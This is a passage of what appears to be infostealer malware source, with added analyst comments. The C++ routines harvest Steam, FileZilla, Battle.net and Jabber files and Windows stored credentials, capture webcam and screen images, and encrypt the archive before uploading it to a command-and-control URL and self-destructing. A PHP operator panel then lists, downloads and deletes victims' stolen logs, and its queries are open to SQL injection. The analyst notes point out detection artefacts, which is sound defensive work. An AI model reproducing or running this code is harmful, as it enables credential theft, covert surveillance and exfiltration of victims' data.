(enumSteam): reads the InstallPath value from HKLM\SOFTWARE\Valve\Steam and, if that path exists, collects loginusers.vdf, config.vdf and ssfn entries into the "Steam" archive folder. */ void enumSteam(HZIP hZip, SIZE_T* count) { 225 | HKEY key = NULL; 226 | LSTATUS os = RegOpenKeyW(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Valve\\Steam", &key); 227 | if (os == ERROR_SUCCESS && key != NULL) 228 | { 229 | WCHAR value[MAX_PATH]; 230 | DWORD value_length = MAX_PATH; 231 | DWORD tpe = REG_SZ; 232 | LSTATUS qs = RegQueryValueExW(key, L"InstallPath", NULL, &tpe, (LPBYTE)&value, &value_length); 233 | if (qs == ERROR_SUCCESS && value != 0) { 234 | 235 | LPCWSTR list[] = { L"loginusers.vdf", L"config.vdf", L"ssfn" }; 236 | if(pathExists(value, FALSE)) 237 | parserImpl(list, count, 3, L"Steam", TRUE, (HZIP)hZip, value); 238 | } 239 | } 240 | } 241 | 242 | /* Analyst note (enumFilezilla): checks for %APPDATA%\FileZilla and passes that directory to parserImpl() with no name list and "FileZilla" as the archive folder. */ void enumFilezilla(HZIP hZip, SIZE_T* count) { 243 | LPCWSTR appdata = resolveEnvrimoment(L"APPDATA"); 244 | lstrcatW((WCHAR*)appdata, L"\\FileZilla"); 245 | 246 | 
if(pathExists(appdata, FALSE)) 247 | parserImpl(0, count, 0, L"FileZilla", FALSE, (HZIP)hZip, appdata); 248 | 249 | _free((void*)appdata); 250 | } 251 | 252 | /* Analyst note (enumBattlenet): looks for a Battle.net directory under both %APPDATA% and %LOCALAPPDATA% and passes each one that exists to parserImpl() with the list .config and .db. */ void enumBattlenet(HZIP hZip, SIZE_T* count) { 253 | LPCWSTR appdata = resolveEnvrimoment(L"APPDATA"); 254 | lstrcatW((WCHAR*)appdata, L"\\Battle.net"); 255 | 256 | if (pathExists(appdata, FALSE)) { 257 | LPCWSTR list[] = { L".config", L".db" }; 258 | parserImpl(list, count, 2, L"Battle.net", TRUE, (HZIP)hZip, appdata); 259 | } 260 | _free((void*)appdata); 261 | 262 | appdata = resolveEnvrimoment(L"LOCALAPPDATA"); 263 | lstrcatW((WCHAR*)appdata, L"\\Battle.net"); 264 | 265 | if (pathExists(appdata, FALSE)) { 266 | LPCWSTR list[] = { L".config", L".db" }; 267 | parserImpl(list, count, 2, L"Battle.net", TRUE, (HZIP)hZip, appdata); 268 | } 269 | _free((void*)appdata); 270 | } 271 | 272 | /* Analyst note (enumJabber): adds three fixed files when present: %APPDATA%\.purple\accounts.xml (stored as Jabber\pidgin.txt) and profiles\default\accounts.xml under %APPDATA%\Psi and %APPDATA%\Psi+ (stored as Jabber\psi.txt and Jabber\psi+.txt). The counter is incremented once per file added. */ void enumJabber(HZIP hZip, SIZE_T* count) { 273 | LPCWSTR appdata = resolveEnvrimoment(L"APPDATA"); 274 | lstrcatW((WCHAR*)appdata, L"\\.purple\\accounts.xml"); 275 | 276 | if (pathExists(appdata, TRUE)) { 277 | ZipAdd(hZip, L"Jabber\\pidgin.txt", appdata); 278 | *count += 1; 279 | } 280 | _free((void*)appdata); 281 | 282 | appdata = resolveEnvrimoment(L"APPDATA"); 283 | lstrcatW((WCHAR*)appdata, L"\\Psi\\profiles\\default\\accounts.xml"); 284 | 285 | if (pathExists(appdata, TRUE)) { 286 | ZipAdd(hZip, L"Jabber\\psi.txt", appdata); 287 | *count += 1; 288 | } 289 | _free((void*)appdata); 290 | 291 | appdata = resolveEnvrimoment(L"APPDATA"); 292 | lstrcatW((WCHAR*)appdata, L"\\Psi+\\profiles\\default\\accounts.xml"); 293 | 294 | if (pathExists(appdata, TRUE)) { 295 | ZipAdd(hZip, L"Jabber\\psi+.txt", appdata); 296 | *count += 1; 297 | } 298 | _free((void*)appdata); 299 | } 300 | 301 | /* Analyst note (enumRDP): despite the name, this enumerates the Windows credential store with CredEnumerateW(NULL, 0, ...) and formats UserName and CredentialBlob of CRED_TYPE_GENERIC entries and UserName of CRED_TYPE_DOMAIN_PASSWORD entries into an archive entry named WinCred.txt. It is not among the collectors that procCredentials() in this file calls. */ void enumRDP(HZIP hZip, SIZE_T* count) { 302 | CHAR* credentialsdata = (CHAR*)_alloc(32767); 303 | DWORD dwCount = 0; 304 | PCREDENTIALW *pCredential = NULL; 305 | if (CredEnumerateW(NULL, 0, &dwCount, &pCredential)) 306 | { 307 | for (DWORD i = 0; i 
< dwCount; i++) 308 | { 309 | if (NULL != pCredential[i]->TargetName) 310 | { 311 | if (CRED_TYPE_GENERIC == pCredential[i]->Type) 312 | { 313 | if (NULL != pCredential[i]->UserName 314 | && NULL != pCredential[i]->CredentialBlob) 315 | { 316 | count += 1; 317 | wnsprintfA(credentialsdata + lstrlenA(credentialsdata), 32767, "\r\n%s : %s", pCredential[i]->UserName, (WCHAR*)pCredential[i]->CredentialBlob); 318 | } 319 | count += 1; 320 | wnsprintfA(credentialsdata + lstrlenA(credentialsdata), 32767, "\r\n%s : (null)", pCredential[i]->UserName); 321 | } 322 | else if (CRED_TYPE_DOMAIN_PASSWORD == pCredential[i]->Type) 323 | { 324 | count += 1; 325 | wnsprintfA(credentialsdata + lstrlenA(credentialsdata), 32767, "\r\n(null) : %s", pCredential[i]->UserName); 326 | } 327 | } 328 | } 329 | CredFree(pCredential); 330 | } 331 | 332 | ZipAdd(hZip, L"WinCred.txt", credentialsdata, lstrlenA(credentialsdata)); 333 | } 334 | 335 | 336 | /* Analyst note (enumWebcam): builds the path %TEMP%\WebCamScreen.png, has captureCam() (defined elsewhere) write to it, adds the file to the archive and then deletes it. A short-lived file with this name in %TEMP% is a host artefact worth hunting for. */ void enumWebcam(HZIP hZip, SIZE_T* webcam_count) { 337 | WCHAR* mem = (WCHAR*)_alloc(32767 * sizeof(WCHAR)); 338 | GetEnvironmentVariableW(L"TEMP", mem, 32767); 339 | lstrcatW(mem, L"\\WebCamScreen.png"); 340 | captureCam(mem); 341 | if(ZipAdd(hZip, L"WebCamScreen.png", mem) == ZR_OK) *webcam_count = 1; 342 | DeleteFileW(mem); 343 | } 344 | 345 | /* Analyst note (enumScreenshot): same flow as enumWebcam() with %TEMP%\Screen.jpg and captureScreenshot() (defined elsewhere); the temporary file is deleted after it is added to the archive. */ void enumScreenshot(HZIP hZip, SIZE_T* webcam_count) { 346 | WCHAR* mem = (WCHAR*)_alloc(32767 * sizeof(WCHAR)); 347 | GetEnvironmentVariableW(L"TEMP", mem, 32767); 348 | lstrcatW(mem, L"\\Screen.jpg"); 349 | captureScreenshot(mem); 350 | if(ZipAdd(hZip, L"Screen.jpg", mem) == ZR_OK) *webcam_count = 1; 351 | DeleteFileW(mem); 352 | } 353 | 354 | /* Analyst note (procCredentials): driver that runs the collectors in a fixed order, starting with enumTelegram() on %APPDATA%\Telegram Desktop\tdata and ending with enumUserprofile(), then adds the text returned by getSystemInfoW() as Information.txt. Each collector receives its own counter pointer, and the caller later reports those counters in the upload. */ void procCredentials(HZIP hZip, SIZE_T* tg_count, SIZE_T* autofill_count, SIZE_T* cc_count, SIZE_T* passws_count, SIZE_T* ck_count, 355 | SIZE_T* ie_count, SIZE_T* crypto_count, SIZE_T* steam_count, SIZE_T* fz_count, SIZE_T* bn_count, SIZE_T* jabber_count, 356 | SIZE_T* webcam_count, SIZE_T* screen_count, SIZE_T* userprofile_count) { 357 | LPCWSTR tg_path = 
resolveEnvrimoment(L"APPDATA"); 358 | lstrcatW((WCHAR*)tg_path, L"\\Telegram Desktop\\tdata"); 359 | 360 | enumTelegram(hZip, tg_path, tg_count); 361 | enumAutofill(hZip, autofill_count); 362 | enumCreditcards(hZip, cc_count); 363 | enumPasswords(hZip, passws_count); 364 | enumCookies(hZip, ck_count); 365 | enumInternetexplorer(hZip, ie_count); 366 | enumCrypto(hZip, crypto_count); 367 | enumSteam(hZip, steam_count); 368 | enumFilezilla(hZip, fz_count); 369 | enumBattlenet(hZip, bn_count); 370 | enumJabber(hZip, jabber_count); 371 | enumWebcam(hZip, webcam_count); 372 | enumScreenshot(hZip, screen_count); 373 | enumUserprofile(hZip, userprofile_count); 374 | 375 | WCHAR* sys_info = (WCHAR*)getSystemInfoW(); 376 | ZipAdd(hZip, L"Information.txt", sys_info, lstrlenW(sys_info) * sizeof(WCHAR)); 377 | 378 | _free(sys_info); 379 | _free((WCHAR*)tg_path); 380 | } 381 | 382 | /* Analyst note (exportData): DLL export that builds the archive in memory (CreateZip(0, 104857600, 0)), runs procCredentials(), passes the buffer through TRAFFIC_ENCRYPT with a key obtained from CryptGenKey() (called here with a single argument, so presumably the project's own routine from crypt.h rather than the Win32 API), base64-encodes the buffer and 256 bytes of key, and hands one JSON object to sendLogsToCNC() for API_URL. The object carries log, key, hwid and country plus the counters telegram, autofill, cc, passwords, cookies, ie, crypto, steam, filezilla, battlenet, jabber, webcam, screen and userprofile; that key set is a usable network signature. Because the key is sent in the same object as the data, a captured request body can be decoded by an analyst who has the TRAFFIC_ENCRYPT routine. The transport itself is in CNC.cpp and is not visible here. */ extern "C" __declspec(dllexport) void exportData() { 383 | void* buf; 384 | unsigned long len; 385 | 386 | JSON_Value* root_value = json_value_init_object(); 387 | JSON_Object* root_object = json_value_get_object(root_value); 388 | 389 | HZIP hZip = CreateZip(0, 104857600, 0); 390 | 391 | SIZE_T tg = 0, af = 0, cc = 0, ps = 0, ck = 0, ie = 0, crypto = 0, steam = 0, fz = 0, battlenet = 0, jabber = 0, webcam = 0, screen = 0, 392 | userprofile = 0; 393 | procCredentials(hZip, &tg, &af, &cc, &ps, &ck, &ie, &crypto, &steam, &fz, &battlenet, &jabber, &webcam, &screen, &userprofile); 394 | 395 | ZipGetMemory(hZip, &buf, &len); 396 | 397 | BYTE* crypt_key = 0; 398 | do { 399 | CryptGenKey(&crypt_key); 400 | } while (crypt_key == 0); 401 | 402 | TRAFFIC_ENCRYPT(crypt_key, (unsigned char*)buf, len); 403 | 404 | SIZE_T log_outlen; 405 | SIZE_T key_outlen; 406 | LPSTR base64_log = base64Encode((unsigned char*)buf, len, &log_outlen); 407 | LPSTR base64_key = base64Encode((unsigned char*)crypt_key, 256, &key_outlen); 408 | LPCSTR country_code = genCountry(); 409 | LPCSTR hwid = genHwid(); 410 | 411 | 
json_object_set_string(root_object, "log", base64_log); 412 | json_object_set_string(root_object, "key", base64_key); 413 | json_object_set_string(root_object, "hwid", hwid); 414 | json_object_set_string(root_object, "country", country_code); 415 | 416 | json_object_set_number(root_object, "telegram", tg); 417 | json_object_set_number(root_object, "autofill", af); 418 | json_object_set_number(root_object, "cc", cc); 419 | json_object_set_number(root_object, "passwords", ps); 420 | json_object_set_number(root_object, "cookies", ck); 421 | json_object_set_number(root_object, "ie", ie); 422 | json_object_set_number(root_object, "crypto", crypto); 423 | json_object_set_number(root_object, "steam", steam); 424 | json_object_set_number(root_object, "filezilla", fz); 425 | json_object_set_number(root_object, "battlenet", battlenet); 426 | json_object_set_number(root_object, "jabber", jabber); 427 | json_object_set_number(root_object, "webcam", webcam); 428 | json_object_set_number(root_object, "screen", screen); 429 | json_object_set_number(root_object, "userprofile", userprofile); 430 | 431 | int json_size = json_serialization_size(root_value) - 1; 432 | char *serialized_string = json_serialize_to_string(root_value); 433 | 434 | sendLogsToCNC(API_URL, (char*)serialized_string, json_size); 435 | 436 | json_free_serialized_string(serialized_string); 437 | json_value_free(root_value); 438 | 439 | _free((void*)hwid); 440 | _free((void*)base64_log); 441 | _free((void*)base64_key); 442 | _free((void*)country_code); 443 | } 444 | 445 | /* Analyst note (WinMain): executable entry point that repeats the exportData() sequence statement for statement; after the upload it calls selfDestruct() (defined elsewhere), and the runLdr() call just before it is commented out. The same JSON key set therefore identifies traffic from both the EXE and the DLL build. */ int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd ) { 446 | void* buf; 447 | unsigned long len; 448 | 449 | JSON_Value* root_value = json_value_init_object(); 450 | JSON_Object* root_object = json_value_get_object(root_value); 451 | 452 | HZIP hZip = CreateZip(0, 104857600, 0); 453 | 454 | SIZE_T tg = 0, af = 0, cc = 0, ps = 0, ck = 0, ie = 0, crypto = 0, steam = 0, fz = 0, battlenet = 0, jabber = 0, 
webcam = 0, screen = 0, 455 | userprofile = 0; 456 | procCredentials(hZip, &tg, &af, &cc, &ps, &ck, &ie, &crypto, &steam, &fz, &battlenet, &jabber, &webcam, &screen, &userprofile); 457 | 458 | ZipGetMemory(hZip, &buf, &len); 459 | 460 | BYTE* crypt_key = 0; 461 | do { 462 | CryptGenKey(&crypt_key); 463 | } while (crypt_key == 0); 464 | 465 | TRAFFIC_ENCRYPT(crypt_key, (unsigned char*)buf, len); 466 | 467 | SIZE_T log_outlen; 468 | SIZE_T key_outlen; 469 | LPSTR base64_log = base64Encode((unsigned char*)buf, len, &log_outlen); 470 | LPSTR base64_key = base64Encode((unsigned char*)crypt_key, 256, &key_outlen); 471 | LPCSTR country_code = genCountry(); 472 | LPCSTR hwid = genHwid(); 473 | 474 | json_object_set_string(root_object, "log", base64_log); 475 | json_object_set_string(root_object, "key", base64_key); 476 | json_object_set_string(root_object, "hwid", hwid); 477 | json_object_set_string(root_object, "country", country_code); 478 | 479 | json_object_set_number(root_object, "telegram", tg); 480 | json_object_set_number(root_object, "autofill", af); 481 | json_object_set_number(root_object, "cc", cc); 482 | json_object_set_number(root_object, "passwords", ps); 483 | json_object_set_number(root_object, "cookies", ck); 484 | json_object_set_number(root_object, "ie", ie); 485 | json_object_set_number(root_object, "crypto", crypto); 486 | json_object_set_number(root_object, "steam", steam); 487 | json_object_set_number(root_object, "filezilla", fz); 488 | json_object_set_number(root_object, "battlenet", battlenet); 489 | json_object_set_number(root_object, "jabber", jabber); 490 | json_object_set_number(root_object, "webcam", webcam); 491 | json_object_set_number(root_object, "screen", screen); 492 | json_object_set_number(root_object, "userprofile", userprofile); 493 | 494 | int json_size = json_serialization_size(root_value) - 1; 495 | char *serialized_string = json_serialize_to_string(root_value); 496 | 497 | sendLogsToCNC(API_URL, (char*)serialized_string, 
json_size); 498 | 499 | json_free_serialized_string(serialized_string); 500 | json_value_free(root_value); 501 | 502 | _free((void*)hwid); 503 | _free((void*)base64_log); 504 | _free((void*)base64_key); 505 | _free((void*)country_code); 506 | //runLdr(); 507 | selfDestruct(); 508 | } -------------------------------------------------------------------------------- /Panel/index.php: -------------------------------------------------------------------------------- 1 | 6) { 16 | header("Location: index.php", true, 301); 17 | die(); 18 | } 19 | if ($p === "") { 20 | $p = 1; 21 | } 22 | 23 | if ($p != null) { 24 | $next = $p + 1; 25 | if ($p != 1) { 26 | $past = $p - 1; 27 | } 28 | }} else { 29 | $p = 1; 30 | $next = 2; 31 | $past = null; 32 | } 33 | 34 | 35 | $logsTotal = $pdoConnection->query("SELECT COUNT(1) FROM `logs`")->fetchColumn(); 36 | $logs24 = $pdoConnection->query("SELECT COUNT(*) FROM `logs` WHERE `date`> UNIX_TIMESTAMP(NOW() - INTERVAL 1 DAY)")->fetchColumn();; 37 | $logsweek = $pdoConnection->query("SELECT COUNT(*) FROM `logs` WHERE `date`> UNIX_TIMESTAMP(NOW() - INTERVAL 7 DAY)")->fetchColumn();; 38 | if(isset($_GET["download"])) $download = formatString($_GET["download"]); 39 | if(isset($_GET["check"])) $check = formatString($_GET["check"]); 40 | if(isset($_GET["searchLogs"])) $searchLogs = formatString($_GET['searchLogs']); 41 | if(isset($_GET["delete"])) $delete = formatString($_GET["delete"]); 42 | if(isset($_GET["comment"])) $comment = formatString($_GET["comment"]); 43 | if(isset($comment)){ 44 | $id = formatString($_GET['id']); 45 | $pdoConnection->query("UPDATE `logs` SET `comment` = '$comment' WHERE `id` = '$id'"); 46 | header("Location: index.php", true, 301); 47 | } 48 | if (isset($download)) { 49 | if(strpos($download,',')!==false){ 50 | $ids = explode(',',$download); 51 | $txt = "logs/".(count($ids)-1) ." Logs ". date("d.m.Y_H:i:s") . 
".zip"; 52 | $zipAll = new ZipArchive(); 53 | $zipAll->open($txt, ZipArchive::CREATE | ZipArchive::OVERWRITE); 54 | for($i=0;$iquery("SELECT hwid, ip, country, date FROM `logs` WHERE `id`=".$ids[$i])->fetch(PDO::FETCH_ASSOC); 56 | $rootPath = realpath("logs/" . $pc["hwid"] . "/"); 57 | if(file_exists($rootPath)){ 58 | $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($rootPath), RecursiveIteratorIterator::LEAVES_ONLY); 59 | 60 | foreach ($files as $name => $file) { 61 | if (!$file->isDir()) { 62 | $filePath = $file->getRealPath(); 63 | $str = date("d.m.Y_H:i:s", $pc["date"]) . "_" . $pc["country"] . "_" . $pc["ip"] . "_" . $pc["hwid"]; 64 | $relativePath = substr($filePath, strlen($rootPath) + 1); 65 | $zipAll->addFile($filePath, $str . "/" . $relativePath); 66 | } 67 | } 68 | $pdoConnection->query("UPDATE `logs` SET `checked` = 1 WHERE `hwid` = '" . $pc["hwid"]."'"); 69 | } 70 | } 71 | $zipAll->close(); 72 | header("Location: " . $txt); 73 | }else{ 74 | $hwid = $pdoConnection->query("SELECT hwid FROM `logs` WHERE id = '" . $download . "'")->fetchColumn(0); 75 | $ip = $pdoConnection->query("SELECT ip FROM `logs` WHERE id = '" . $download . "'")->fetchColumn(0); 76 | $country = $pdoConnection->query("SELECT country FROM `logs` WHERE id = '" . $download . "'")->fetchColumn(0); 77 | $datee = $pdoConnection->query("SELECT date FROM `logs` WHERE id = '" . $download . "'")->fetchColumn(0); 78 | $str = date("d.m.Y_H:i:s", $datee) . "_" . $country . "_" . $ip . "_" . $hwid; 79 | $txt = "logs/" .$str. ".zip"; 80 | $rootPath = realpath("logs/" . $hwid . "/"); 81 | $zip = new ZipArchive(); 82 | $zip->open($txt, ZipArchive::CREATE | ZipArchive::OVERWRITE); 83 | $zip->setArchiveComment(file_get_contents("logs/" . $hwid . 
"/information.log")); 84 | 85 | $files = new RecursiveIteratorIterator( 86 | new RecursiveDirectoryIterator($rootPath), 87 | RecursiveIteratorIterator::LEAVES_ONLY 88 | ); 89 | 90 | foreach ($files as $name => $file) { 91 | if (!$file->isDir()) { 92 | $filePath = $file->getRealPath(); 93 | 94 | $relativePath = substr($filePath, strlen($rootPath) + 1); 95 | $zip->addFile($filePath, $relativePath); 96 | } 97 | } 98 | 99 | $zip->close(); 100 | $pdoConnection->query("UPDATE `logs` SET `checked` = '1' WHERE `hwid` = '$hwid'"); 101 | header("Location: ". $txt); 102 | exit; 103 | } 104 | } 105 | if (isset($delete)) { 106 | if(strpos($delete,',')!==false){ 107 | $ids = explode(',',$delete); 108 | for($i=0;$iquery("SELECT hwid FROM `logs` WHERE id = '" . formatString($ids[$i]) . "'")->fetchColumn(0); 111 | $dir = "logs/" . $hwid . "/"; 112 | if(strlen($dir)>6){ 113 | $it = new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS); 114 | $files = new RecursiveIteratorIterator($it, 115 | RecursiveIteratorIterator::CHILD_FIRST); 116 | foreach ($files as $file) { 117 | if ($file->isDir()) { 118 | rmdir($file->getRealPath()); 119 | } else { 120 | unlink($file->getRealPath()); 121 | } 122 | } 123 | rmdir($dir); 124 | } 125 | } catch (Exception $ex) { 126 | } 127 | $pdoConnection->exec("DELETE FROM `logs` WHERE id = '" . $ids[$i] . "'"); 128 | } 129 | }else{ 130 | try { 131 | $hwid = $pdoConnection->query("SELECT hwid FROM `logs` WHERE id = '" . formatString($delete) . "'")->fetchColumn(0); 132 | $dir = "logs/" . $hwid . 
"/"; 133 | if(strlen($dir)>6){ 134 | $it = new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS); 135 | $files = new RecursiveIteratorIterator($it, 136 | RecursiveIteratorIterator::CHILD_FIRST); 137 | foreach ($files as $file) { 138 | if ($file->isDir()) { 139 | rmdir($file->getRealPath()); 140 | } else { 141 | unlink($file->getRealPath()); 142 | } 143 | } 144 | rmdir($dir); 145 | } 146 | } catch (Exception $ex) { 147 | } 148 | $pdoConnection->exec("DELETE FROM `logs` WHERE id = '" . $delete . "'"); 149 | header("Location: index.php", true, 301); 150 | } 151 | } 152 | 153 | if (isset($check)) { 154 | $pdoConnection->exec("UPDATE `logs` SET checked = 1 WHERE id = '" . $check . "'"); 155 | } 156 | 157 | if ($p) { 158 | $bots = $pdoConnection->query('SELECT * FROM `logs` ORDER BY `id` DESC LIMIT ' . $past . '00, 100')->fetchAll(PDO::FETCH_ASSOC); 159 | } else { 160 | $bots = $pdoConnection->query("SELECT * FROM `logs` ORDER BY `id` DESC LIMIT 100")->fetchAll(PDO::FETCH_ASSOC); 161 | } 162 | 163 | function formatString($param) 164 | { 165 | $returnString = $param; 166 | $returnString = trim($returnString); 167 | $returnString = stripslashes($returnString); 168 | $returnString = htmlspecialchars($returnString); 169 | 170 | return $returnString; 171 | } 172 | 173 | ?> 174 | 175 | 176 | 177 | 178 | Dashboard 179 | 180 | 181 | 182 | 183 | 184 | 185 |
186 |
187 |
188 | 210 |
211 |
212 |
213 |
214 |
215 |
216 |
217 |
218 |
219 | 220 | 221 | 222 | 223 | 224 | 225 | 226 | 227 | 228 | 229 | 230 | 231 | 232 | 233 | 234 |
Total Logs
24 h. Logs
Week Logs
235 |
236 |
237 |
238 |
239 |
240 |
241 |
242 |

Top 3 Countries

243 | 244 | 245 | 246 | 247 | 248 | 249 | 250 | 251 | query("SELECT country, COUNT(*) AS cnt FROM logs GROUP BY country ORDER BY cnt DESC LIMIT 3"); 255 | while ($c = $csel->fetch()) 256 | { 257 | echo ''; 258 | } 259 | }else{ 260 | echo ''; 261 | } 262 | ?> 263 | 264 |
Country# of logs
'.$c[0].''.number_format($c[1]).'
No data to display
265 |
266 |
267 |
268 |
269 |
270 |
271 |
272 |
273 |

Top 3 Operating Systems

274 | 275 | 276 | 277 | 278 | 279 | 280 | 281 | 282 | query("SELECT system, COUNT(*) AS cnt FROM logs GROUP BY system ORDER BY cnt DESC LIMIT 3"); 286 | while ($o = $osel->fetch()) 287 | { 288 | echo ''; 289 | } 290 | }else{ 291 | echo ''; 292 | } 293 | ?> 294 | 295 |
Operating System# of logs
'.$o[0].''.number_format($o[1]).'
No data to display
296 |
297 |
298 |
299 |
300 |
301 |
302 |
303 |
304 |
305 | 306 | Download 307 | Delete 308 |
309 |
310 | 311 | 312 | 313 | 314 | 315 | 316 | 317 | 318 | 319 | 320 | 321 | 322 | 323 | 324 | 325 | 326 | 330 | 331 | 332 | 338 | 339 | 374 | 377 | 380 | 381 | 382 | 383 | 385 | 395 | 410 | 411 | 412 | Printed ".count($bots)." logs"; 415 | ?> 416 | 417 |
StatsHWID/SystemNetworkDateVersionIDCommentActions
'; 334 | }else{ 335 | echo ''; 336 | } 337 | ?> 340 | 342 | 0) echo "color:red;";?>"> 344 | 345 | 346 | 347 | 348 | 349 | 350 | query("SELECT id,color,pattern,name FROM `presets`"); 352 | $b=0; 353 | while($presetArray=$presetsArray->fetch()){ 354 | $siteFinded = explode(";",$presetArray[2]); 355 | foreach($siteFinded as $key){ 356 | if(file_exists("logs/" . $bot["hwid"] . "/" . "passwords.log")){ 357 | if (strpos(file_get_contents("logs/" . $bot["hwid"] . "/" . "passwords.log"), $key) !== false) { 358 | if($b==0){echo '

';$b++;} 359 | echo ''.$key.' '; 361 | } 362 | } 363 | if(file_exists("logs/" . $bot["hwid"] . "/" . "cookieDomains.log")){ 364 | if (strpos(file_get_contents("logs/" . $bot["hwid"] . "/" . "cookieDomains.log"), $key) !== false) { 365 | if($b==0){echo '

';$b++;} 366 | echo ''.$key.' '; 368 | } 369 | } 370 | } 371 | } 372 | ?> 373 |

375 | 376 |

378 | 379 |
".$bot['userID'].""; ?> 386 |
387 |
388 | 389 | 390 | 392 |
393 |
394 |
396 |
397 | 401 | 408 |
409 |
418 |
419 | 420 | 454 |
455 |
456 |
457 |
458 |
459 | 460 | 461 | 462 | 465 | 468 | 471 | 513 | 540 | --------------------------------------------------------------------------------